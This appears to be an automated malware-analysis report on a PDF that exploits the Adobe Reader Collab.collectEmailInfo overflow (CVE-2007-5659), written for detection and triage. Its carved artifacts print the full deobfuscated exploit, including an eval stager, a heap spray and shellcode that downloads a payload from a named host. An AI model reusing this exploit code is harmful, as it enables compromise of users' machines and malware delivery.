MALICIOUS
Risk Score: 266
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
Malware Insights
The PDF file contains JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The script is designed to download a second-stage payload from the embedded URL 'http://rebulkinc.com/cgi-bin/ca7/z002106201r0019R7516ac91X43d189fcY3af6b022Z0100f060'. The use of String.fromCharCode and obfuscation techniques within the JavaScript indicates an attempt to conceal malicious activity.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9999
Heuristics (9)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action (low; 4 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high; CVE likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  Matched line in script: `var ic_j_3_O7_8_S = new Array();var qN403__d = 0;var J__mG_c_U_k0Ks = "";function anmY_oI__5_tr2g(g7_rM3t, KrRRa4E_i0){var S__S_E = KrRRa4E_i0.toString();var Uuds6Bt_G0_U = "";for(var OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < S__S_E.length; OoGoU_4_5spFnuU++) {var f__I8J7_Y3k0W0s = parseInt(S__S_E.substr(OoGoU_4_5spFnuU, 1));if (!isNaN(f__I8J7_Y3k0W0s)) {f__I8J7_Y3k0W0s = f__I8J7_Y3k0W0s.toString(16);if (f__I8J7_Y3k0W0s.length == 1) { f__I8J7_Y3k0W0s = "0" + f__I8J7_Y3k0W0s; }else if (f__I8J7_Y3k0W …`
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script: `for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); }`
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- syncAnnotScan annotation-staging primitive (low; rule PDF_FOXIT_SYNCANNOTSCAN): PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (Identified after JavaScript deobfuscation.)
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://rebulkinc.com/cgi-bin/ca7/z002106201r0019R7516ac91X43d189fcY3af6b022Z0100f060 (referenced by PDF JavaScript)
Extracted artifacts (4)
Files carved from inside the sample during analysis.

javascript_obj0004_000.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 4 at offset 0xE1
- Size: 1814 bytes
- SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10";
function decrypt(str, jump){
var result = "";
var list = str.split(',');
for (var i=0; i < list.length; i++) {
result += String.fromCharCode(list[i] - jump);
}
return result;
}

numeric_charcode_stage_000.js
- Kind: deobfuscated-js
- Source: numeric char-code string decoded JavaScript at offset 0xEF
- Size: 469 bytes
- SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
    var num = 1;
    pr = app.doc.getAnnots(
        {
            nPage: 0
        }
    );
    sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
    fnc += 'a';
    var arr = sum.split(/-/);
    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x"+arr[i]);
    }
    fnc += 'l';
}
if (app.plugIns.length >= 2)
{
    app[fnc]/**/(buf);
}

legacy_pdfkit_stage_000.js
- Kind: deobfuscated-js
- Source: repeated-marker hex decoded JavaScript at offset 0x1C55
- Size: 1862 bytes
- SHA-256: f77163af9c1f6e78aa6cd9f9811c28d2e382c4b135aa0b23264d0f5931969574
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
function SI__8__dy(N6_buB4V8gB3h, UF___6y_Xx_j){var pp_4U_Kb_J = 0;var l67tr3Uj = 4;var K_W43_q__4FB8a = new Array();var LsE1_u_g_0d = new Array(107,256,101, 512, 106, 126, 44,405, 142);var Q5w7_tX5wxKUy = "";LsE1_u_g_0d[5] -= 103;try {var ukqrO_0__415 = 0;if (app) {UF___6y_Xx_j = pr[ukqrO_0__415].subject;}} catch(e) {}pp_4U_Kb_J = this;if (!N6_buB4V8gB3h) { K_W43_q__4FB8a[0] = 0;K_W43_q__4FB8a[1] = K_W43_q__4FB8a[0];K_W43_q__4FB8a[2] = K_W43_q__4FB8a[1];K_W43_q__4FB8a[3] = K_W43_q__4FB8a[2];var avec5yIOF_d_4 = LsE1_u_g_0d[6] + 3;var d8I260_2N_E = avec5yIOF_d_4 + 11;var vQiui_g = SI__8__dy;var WdR_Qj66gik2_Q6 = 0;vQiui_g = vQiui_g.toString();for(var Iq_5Sqpd1__X = 0; Iq_5Sqpd1__X < vQiui_g.length; Iq_5Sqpd1__X++) {var C_r_r8iiP = vQiui_g.charCodeAt(Iq_5Sqpd1__X);if (C_r_r8iiP > avec5yIOF_d_4 && C_r_r8iiP < d8I260_2N_E) {if (WdR_Qj66gik2_Q6 == 4) {WdR_Qj66gik2_Q6 = 0;}K_W43_q__4FB8a[WdR_Qj66gik2_Q6] += C_r_r8iiP;if (K_W43_q__4FB8a[WdR_Qj66gik2_Q6] > LsE1_u_g_0d[3]) {K_W43_q__4FB8a[WdR_Qj66gik2_Q6] -= 512;}WdR_Qj66gik2_Q6++;}}}else { K_W43_q__4FB8a = N6_buB4V8gB3h;}for (var QG4Q86 = 0; QG4Q86 < 4; QG4Q86++) {if (K_W43_q__4FB8a[QG4Q86] > LsE1_u_g_0d[1]) {K_W43_q__4FB8a[QG4Q86] -= LsE1_u_g_0d[1];}}var n___v4_8YbS2 = 0;var KRt2_1_Nu__jeq6 = 0;var eOU2S_J;var OC_Kws17Q_ce = 0;while ( n___v4_8YbS2 < UF___6y_Xx_j.length ) {var Iohc8m7_IF_H__V = "";Iohc8m7_IF_H__V = UF___6y_Xx_j.substr(n___v4_8YbS2, 2);var A_xVQ2ss_U = parseInt(Iohc8m7_IF_H__V, LsE1_u_g_0d[5]); if (KRt2_1_Nu__jeq6 == 4) {KRt2_1_Nu__jeq6 = 0;}A_xVQ2ss_U -= (OC_Kws17Q_ce + 2) * K_W43_q__4FB8a[KRt2_1_Nu__jeq6];if (A_xVQ2ss_U < 0) {A_xVQ2ss_U -= Math.floor(A_xVQ2ss_U / LsE1_u_g_0d[1]) * LsE1_u_g_0d[1];}Q5w7_tX5wxKUy += String.fromCharCode(A_xVQ2ss_U);{n___v4_8YbS2 += 2;OC_Kws17Q_ce++;KRt2_1_Nu__jeq6++;}}pp_4U_Kb_J["eval"](Q5w7_tX5wxKUy);return 0;}
SI__8__dy(0);

legacy_pdfkit_stage_001.js
- Kind: deobfuscated-js
- Source: annotation-subject callee-key decoded JavaScript at offset 0x4BB
- Size: 5087 bytes
- SHA-256: 4f06aad5d1cdda3613e3c0479bab1a40248a25f6fcc0855811cd30ac7b7b48f5
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
var ic_j_3_O7_8_S = new Array();var qN403__d = 0;var J__mG_c_U_k0Ks = "";function anmY_oI__5_tr2g(g7_rM3t, KrRRa4E_i0){var S__S_E = KrRRa4E_i0.toString();var Uuds6Bt_G0_U = "";for(var OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < S__S_E.length; OoGoU_4_5spFnuU++) {var f__I8J7_Y3k0W0s = parseInt(S__S_E.substr(OoGoU_4_5spFnuU, 1));if (!isNaN(f__I8J7_Y3k0W0s)) {f__I8J7_Y3k0W0s = f__I8J7_Y3k0W0s.toString(16);if (f__I8J7_Y3k0W0s.length == 1) { f__I8J7_Y3k0W0s = "0" + f__I8J7_Y3k0W0s; }else if (f__I8J7_Y3k0W0s.length != 2) { f__I8J7_Y3k0W0s = "00"; }Uuds6Bt_G0_U = f__I8J7_Y3k0W0s + Uuds6Bt_G0_U;}}while(Uuds6Bt_G0_U.length < 8) { Uuds6Bt_G0_U = "0" + Uuds6Bt_G0_U; }var XTqat_h = g7_rM3t.toString(16);if (XTqat_h.length == 1) { XTqat_h = "0" + XTqat_h; }else if (XTqat_h.length != 2) { XTqat_h = "00"; }Uuds6Bt_G0_U = "3" + XTqat_h + "P" + Uuds6Bt_G0_U;return Uuds6Bt_G0_U;}function L7a_lfu5(Cf57X2x, Up7XnQS_707Imv){var B4De1jl6lA_y = new Array("");var cn36GkNaWp = Cf57X2x;var C__Qi28q;if ((C__Qi28q = Cf57X2x.lastIndexOf("%u00")) != -1) {if (C__Qi28q + 6 == Cf57X2x.length) {B4De1jl6lA_y[0] = Cf57X2x.substr(C__Qi28q + 4, 2);cn36GkNaWp = Cf57X2x.substring(0, C__Qi28q);}}C__Qi28q = 1;for (OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < Up7XnQS_707Imv.length; OoGoU_4_5spFnuU++) {var Clgt3Y_8cjh = Up7XnQS_707Imv.charCodeAt(OoGoU_4_5spFnuU).toString(16);if (Clgt3Y_8cjh.length == 1) { Clgt3Y_8cjh = "0" + Clgt3Y_8cjh; }B4De1jl6lA_y[C__Qi28q] = Clgt3Y_8cjh;C__Qi28q++;}OoGoU_4_5spFnuU = B4De1jl6lA_y[0].length ? 
0 : 1;B4De1jl6lA_y[C__Qi28q] = "00";B4De1jl6lA_y[C__Qi28q + 1] = "00";C__Qi28q += 2;if ((B4De1jl6lA_y.length - OoGoU_4_5spFnuU) % 2) {B4De1jl6lA_y[C__Qi28q] = "00";}while(OoGoU_4_5spFnuU < B4De1jl6lA_y.length) {cn36GkNaWp += "%u" + B4De1jl6lA_y[OoGoU_4_5spFnuU + 1] + B4De1jl6lA_y[OoGoU_4_5spFnuU];OoGoU_4_5spFnuU += 2;}cn36GkNaWp += "%u0000";return cn36GkNaWp;}function oKNBYW_C5V(r4_xE6V_qr8_7_j, bb_PviR7_W){while (r4_xE6V_qr8_7_j.length*2<bb_PviR7_W) {r4_xE6V_qr8_7_j += r4_xE6V_qr8_7_j;}r4_xE6V_qr8_7_j = r4_xE6V_qr8_7_j.substring(0,bb_PviR7_W/2);return r4_xE6V_qr8_7_j;}function w0cE4__YL7(S__In_d, I_dS_F, q3qm_h_F){var hVa4LiP3y__qxoY = 0x0c0c0c0c;var r4_xE6V_qr8_7_j = unescape(I_dS_F);var Up7XnQS_707Imv = anmY_oI__5_tr2g(S__In_d, q3qm_h_F);var BpV_0u8__T8R = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var Cf57X2x = "%u9050%u9050%u9050%u9050" + 
"%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7270%u4c69%u0064%u7468%u7074%u2f3a%u722f%u6265%u6c75%u696b%u636e%u632e%u6d6f%u632f%u6967%u622d%u6e69%u632f%u3761%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931%u3752%u3135%u6136%u3963%u5831%u3334%u3164%u3938%u6366%u3359%u6661%u6236%u3230%u5a32%u3130%u3030%u3066%u3036";app.Lmmh_8i_5 = unescape(L7a_lfu5(Cf57X2x, Up7XnQS_707Imv));var eD3x_f = 0x400000;var hd1XQ42_DcH = BpV_0u8__T8R.length * 2;var bb_PviR7_W = eD3x_f - (hd1XQ42_DcH+0x38);r4_xE6V_qr8_7_j = oKNBYW_C5V(r4_xE6V_qr8_7_j, bb_PviR7_W);var BpP4Y_h_X_Mj = (hVa4LiP3y__qxoY - 0x400000)/eD3x_f;for (var i7Q_D6_7KRw = 0; i7Q_D6_7KRw < BpP4Y_h_X_Mj; i7Q_D6_7KRw++) {ic_j_3_O7_8_S[i7Q_D6_7KRw] = r4_xE6V_qr8_7_j + BpV_0u8__T8R;}}function e40u_1_1w__h(){var m7_I_qpx = "";for (OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < 12; OoGoU_4_5spFnuU++) {m7_I_qpx += unescape("%u0c0c%u0c0c");}var cLUq7i_0e_2pM3q = "";for (OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < 750; OoGoU_4_5spFnuU++) {cLUq7i_0e_2pM3q += m7_I_qpx;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: cLUq7i_0e_2pM3q});app.clearTimeOut(qN403__d);}function ntP__7Phuj(F___LV){var 
r_MGB___CJ___8 = qN403__d;if ((F___LV >= 8 && F___LV < 8.11) || F___LV < 7.1) {w0cE4__YL7(23, "%u0c0c%u0c0c", F___LV);e40u_1_1w__h();}if (r_MGB___CJ___8) {app.clearTimeOut(r_MGB___CJ___8);}}var q3qm_h_F = 0;var f1Fa_o = app.plugIns;for (var an2_oQU_i5o8s = 0; an2_oQU_i5o8s < f1Fa_o.length; an2_oQU_i5o8s++) {var u_6FuWCXg = f1Fa_o[an2_oQU_i5o8s].version;if (u_6FuWCXg > q3qm_h_F) { q3qm_h_F = u_6FuWCXg; }}if (app.viewerVersion == 9.103 && q3qm_h_F < 9.13) {q3qm_h_F = 9.13;}app.k_2M6_V = ntP__7Phuj;qN403__d = app.setTimeOut("app.k_2M6_V(" + q3qm_h_F.toString() + ")", 50);